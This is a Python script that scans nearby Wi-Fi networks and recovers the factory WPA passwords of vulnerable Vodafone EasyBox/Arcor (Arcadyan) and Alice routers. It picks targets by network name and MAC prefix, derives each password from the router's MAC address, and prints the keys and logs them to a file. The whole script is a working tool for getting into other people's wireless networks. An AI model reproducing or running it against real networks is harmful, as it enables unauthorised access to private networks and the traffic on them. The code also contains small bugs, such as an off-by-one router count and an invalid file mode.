#!/usr/bin/python

from pythonwifi.iwlibs import Wireless
import hashlib, base64
from termcolor import *
from sys import *
if len(argv) == 1:
    print "Please enter a WLAN-device! Like: '" + argv[0] + " wlan0'"
    exit(0)

wifi = Wireless(argv[1])
vrouters=[]

frequency_map = {
    2412000000: "1",
    2417000000: "2",
    2422000000: "3",
    2427000000: "4",
    2432000000: "5",
    2437000000: "6",
    2442000000: "7",
    2447000000: "8",
    2453000000: "9",
    2457000000: "10",
    2462000000: "11",
    2467000000: "12",
    2472000000: "13",
    2484000000: "14",
    5180000000: "36",
    5200000000: "40",
    5220000000: "44",
    5240000000: "48",
    5260000000: "52",
    5280000000: "56",
    5300000000: "60",
    5320000000: "64",    
    5500000000: "100",
    5520000000: "104",
    5540000000: "108",
    5560000000: "112",
    5580000000: "116",
    5600000000: "120",
    5620000000: "124",
    5640000000: "128",    
    5660000000: "132",
    5680000000: "136",
    5700000000: "140",
    5735000000: "147",
    5755000000: "151",
    5775000000: "155",
    5795000000: "159",
    5815000000: "163",
    5835000000: "167",
    5785000000: "171"
}

#Funtctions

#Arcadyan Standart WPA Key_Gen by wotan.cc

def std_wpa_arcadyan(mac):
    bytes = [int(x, 16) for x in mac.split(':')]

    c1 = (bytes[-2] << 8) + bytes[-1]
    (s6, s7, s8, s9, s10) = [int(x) for x in '%05d' % (c1)]
    (m7, m8, m9, m10, m11, m12) = [int(x, 16) for x in mac.replace(':', '')[6:]]

    k1 = (s7 + s8 + m11 + m12) & (0x0F)
    k2 = (m9 + m10 + s9 + s10) & (0x0F)

    x1 = k1 ^ s10
    x2 = k1 ^ s9
    x3 = k1 ^ s8
    y1 = k2 ^ m10
    y2 = k2 ^ m11
    y3 = k2 ^ m12
    z1 = m11 ^ s10
    z2 = m12 ^ s9
    z3 = k1 ^ k2

    return "%X%X%X%X%X%X%X%X%X" % (x1, y1, z1, x2, y2, z2, x3, y3, z3)

#Alice Key_Gen by wardrive-forum.de

def std_wpa_alice(mac):
    mac = mac.replace(":", "")
    mac = '%s%02x' %(mac[:10], int(mac[10:],16)-1)
    
    return base64.b64encode(hashlib.md5(mac.lower()).hexdigest()[:12])

#Scan for AP's that's vulnerable for computing standart WPA-Passwords

def scan_vuln():
    for ap in wifi.scan():
        if ap.essid[:4] == "Easy" or ap.essid[:4] == "ARCO" or ap.essid[:4] != "ALIC" and ap.bssid[:8] == "74:31:70" or ap.essid[:4] != "ALIC" and ap.bssid[:8] == "7C:4F:B5" or ap.bssid[:8] == "00:23:08":
            arcadyan_vuln_router = ([ap.essid, ap.bssid, std_wpa_arcadyan(ap.bssid), "Arcadyan [Vodafone EasyBox 80x; Arcor]"])
            if arcadyan_vuln_router not in vrouters:
                vrouters.append(arcadyan_vuln_router)

        if ap.essid[:4] != "Easy" and ap.bssid[:8] == "74:31:70" or ap.essid[:4] == "ALIC" or ap.essid[:4] != "Easy" and ap.bssid[:8] == "7C:4F:B5" or ap.bssid[:8] == "00:1C:28":
            alice_vuln_router = ([ap.essid, ap.bssid, std_wpa_alice(ap.bssid), "Alice 02"])
            if alice_vuln_router not in vrouters:
                vrouters.append(alice_vuln_router)

#main code

x = 0
while x <= 100:
    scan_vuln()
    x += 1

vrouters.sort()
print colored("Number of vulnerable routers found: " + str((len(vrouters))-1), 'red')        
for item in vrouters:
    string = str(item).replace("'", "")
    open("wpa.db", "ar").write(string.replace(",", "\t\t") + "\n")
    print string.replace(",", "\t\t")
